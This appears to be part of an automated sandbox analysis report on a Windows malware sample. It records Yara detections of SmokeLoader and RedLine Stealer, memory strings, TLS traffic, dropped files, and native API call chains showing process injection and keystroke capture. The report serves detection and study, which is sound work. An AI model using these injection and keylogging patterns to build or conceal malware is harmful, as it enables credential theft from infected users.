Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-big-3-mistakes-financial-advisors-say-that-the-1
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/money/personalfinance/the-no-1-phrase-people-who-are-good-at-small-talk-al
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/predicting-what-the-pac-12-would-look-like-after-expansion-wi
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/sports/other/washington-state-ad-asks-ncaa-for-compassion-and-understandin
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/accuweather-el-ni
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt
Source: explorer.exe, 00000002.00000000.1504995292.0000000006F0F000.00000004.00000001.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com:443/en-us/feed

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49739
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 49738 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49761 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49726
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745

Source: unknown	HTTPS traffic detected: 23.145.40.164:443 -> 192.168.2.8:49726 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49743 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49744 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49745 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49746 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49747 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49748 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49749 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49757 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49759 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 23.145.40.162:443 -> 192.168.2.8:49763 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected SmokeLoader

Source: Yara match	File source: 0000000F.00000002.3873306436.0000000000351000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.3873767397.0000000000C21000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 1996, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: explorer.exe PID: 7144, type: MEMORYSTR
Source: Yara match	File source: 7.2.4470.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.2.4470.exe.2160e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.3.fihcrfb.6d0000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.6c0e67.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 7.3.4470.exe.2170000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.fihcrfb.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000003.2301467371.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000003.2015538177.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 16_2_00AD162B GetKeyboardState,ToUnicode,

16_2_00AD162B

Source: C:\Users\user\AppData\Local\Temp\354F.exe

9_2_00007FF780B63220

System Summary

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.1520190033.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809368934.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2067865752.0000000002430000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000007.00000002.2067784518.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1520136328.0000000002170000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2357152102.00000000006C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000008.00000002.2358792511.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809608817.0000000002191000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000000.00000002.1519967739.000000000078F000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000007.00000002.2067913469.0000000002451000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000004.00000002.1809320353.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.1520041512.0000000002160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000007.00000002.2067712558.00000000006CD000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000008.00000002.2357485179.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 00000008.00000002.2358138037.000000000070D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000004.00000002.1809489759.000000000063E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown

Abnormal high CPU Usage

Source: C:\Windows\explorer.exe

Process Stats: CPU usage > 49%

Contains functionality to call native functions

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401514
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	0_2_00402F97
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401542
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403247
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401549
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	0_2_0040324F
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403256
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_00401557
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	0_2_0040326C
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403277 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403277
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_0040327D NtTerminateProcess,RtlInitUnicodeString,	0_2_0040327D
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	0_2_004014FE
Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	0_2_00403290
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401514 EntryPoint,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401514
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00402F97 RtlCreateUserThread,NtTerminateProcess,	4_2_00402F97
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401542 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401542
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403247 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403247
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401549 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401549
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040324F NtTerminateProcess,RtlInitUnicodeString,	4_2_0040324F
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403256 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403256
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00401557 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_00401557
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040326C NtTerminateProcess,RtlInitUnicodeString,	4_2_0040326C
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403277 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403277
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_0040327D NtTerminateProcess,RtlInitUnicodeString,	4_2_0040327D
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004032C7 ExpandEnvironmentStringsW,CreateFileW,CreateFileMappingW,MapViewOfFile,NtMapViewOfSection,NtDuplicateObject,NtQuerySystemInformation,NtOpenKey,strstr,tolower,	4_2_004032C7
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_004014FE NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	4_2_004014FE
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00403290 NtTerminateProcess,RtlInitUnicodeString,	4_2_00403290
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00403043 RtlCreateUserThread,NtTerminateProcess,	7_2_00403043
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004014C4
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_00401508 NtAllocateVirtualMemory,	7_2_00401508
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014CF NtAllocateVirtualMemory,	7_2_004014CF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015D5
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014DE NtAllocateVirtualMemory,	7_2_004014DE
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015DF
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015E6
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	7_2_004015F2
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014F5 NtAllocateVirtualMemory,	7_2_004014F5
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014F8 NtAllocateVirtualMemory,	7_2_004014F8
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004014FB NtAllocateVirtualMemory,	7_2_004014FB
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00403043 RtlCreateUserThread,NtTerminateProcess,	8_2_00403043
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014C4 NtAllocateVirtualMemory,NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004014C4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_00401508 NtAllocateVirtualMemory,	8_2_00401508
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014CF NtAllocateVirtualMemory,	8_2_004014CF
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015D5 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015D5
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014DE NtAllocateVirtualMemory,	8_2_004014DE
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015DF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015DF
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015E6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015E6
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004015F2 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,	8_2_004015F2
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014F5 NtAllocateVirtualMemory,	8_2_004014F5
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014F8 NtAllocateVirtualMemory,	8_2_004014F8
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004014FB NtAllocateVirtualMemory,	8_2_004014FB
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C34B92 RtlMoveMemory,NtUnmapViewOfSection,	11_2_00C34B92
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C333C3 NtQueryInformationFile,	11_2_00C333C3
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle,	11_2_00C3349B
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3342B NtQueryObject,NtQueryObject,RtlMoveMemory,	11_2_00C3342B
Source: C:\Windows\explorer.exe	Code function: 13_2_00D338B0 NtUnmapViewOfSection,	13_2_00D338B0
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	14_2_00C21016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21A80 NtCreateSection,NtMapViewOfSection,	14_2_00C21A80
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 14_2_00C21819 lstrcmpiA,OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	14_2_00C21819
Source: C:\Windows\explorer.exe	Code function: 15_2_0035355C NtUnmapViewOfSection,	15_2_0035355C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD1016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,wsprintfA,RtlMoveMemory,CreateToolhelp32Snapshot,Process32First,CharLowerA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,	16_2_00AD1016
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD1B26 NtCreateSection,NtMapViewOfSection,	16_2_00AD1B26
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 16_2_00AD18BF OpenProcess,NtSetInformationProcess,CloseHandle,NtUnmapViewOfSection,NtUnmapViewOfSection,RtlMoveMemory,RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,CloseHandle,CreateMutexA,GetLastError,CloseHandle,Sleep,GetModuleHandleA,GetProcAddress,ReadProcessMemory,WriteProcessMemory,CreateRemoteThread,CloseHandle,Sleep,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	16_2_00AD18BF
Source: C:\Windows\explorer.exe	Code function: 17_2_00E0370C NtUnmapViewOfSection,	17_2_00E0370C

Detected potential crypto function

Source: C:\Users\user\Desktop\OCYe9qcxiM.exe	Code function: 0_2_00418C80	0_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 4_2_00418C80	4_2_00418C80
Source: C:\Users\user\AppData\Local\Temp\4470.exe	Code function: 7_2_004189C0	7_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 8_2_004189C0	8_2_004189C0
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B69AC8	9_2_00007FF780B69AC8
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6DC08	9_2_00007FF780B6DC08
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6A774	9_2_00007FF780B6A774
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6A51C	9_2_00007FF780B6A51C
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6213C	9_2_00007FF780B6213C
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B6B424	9_2_00007FF780B6B424
Source: C:\Users\user\AppData\Local\Temp\354F.exe	Code function: 9_2_00007FF780B63220	9_2_00007FF780B63220
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_3_05DCCCF1	11_3_05DCCCF1
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C32198	11_2_00C32198
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C3C2F9	11_2_00C3C2F9
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C4B35C	11_2_00C4B35C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C84438	11_2_00C84438
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C4B97E	11_2_00C4B97E
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C36E6A	11_2_00C36E6A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 11_2_00C55F08	11_2_00C55F08
Source: C:\Windows\explorer.exe	Code function: 13_2_00D31E20	13_2_00D31E20
Source: C:\Windows\explorer.exe	Code function: 15_2_00352860	15_2_00352860
Source: C:\Windows\explorer.exe	Code function: 15_2_00352054	15_2_00352054
Source: C:\Windows\explorer.exe	Code function: 17_2_00E020F4	17_2_00E020F4
Source: C:\Windows\explorer.exe	Code function: 17_2_00E02A04	17_2_00E02A04
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00406E80	33_2_00406E80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00418C80	33_2_00418C80
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004084AD	33_2_004084AD
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004040B4	33_2_004040B4
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_00401D5E	33_2_00401D5E
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004073C4	33_2_004073C4
Source: C:\Users\user\AppData\Roaming\hehcrfb	Code function: 33_2_004097A1	33_2_004097A1
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00406E80	34_2_00406E80
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004084AD	34_2_004084AD
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004040B4	34_2_004040B4
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_00401D5E	34_2_00401D5E
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004189C0	34_2_004189C0
Source: C:\Users\user\AppData\Roaming\fihcrfb	Code function: 34_2_004073C4	34_2_004073C4
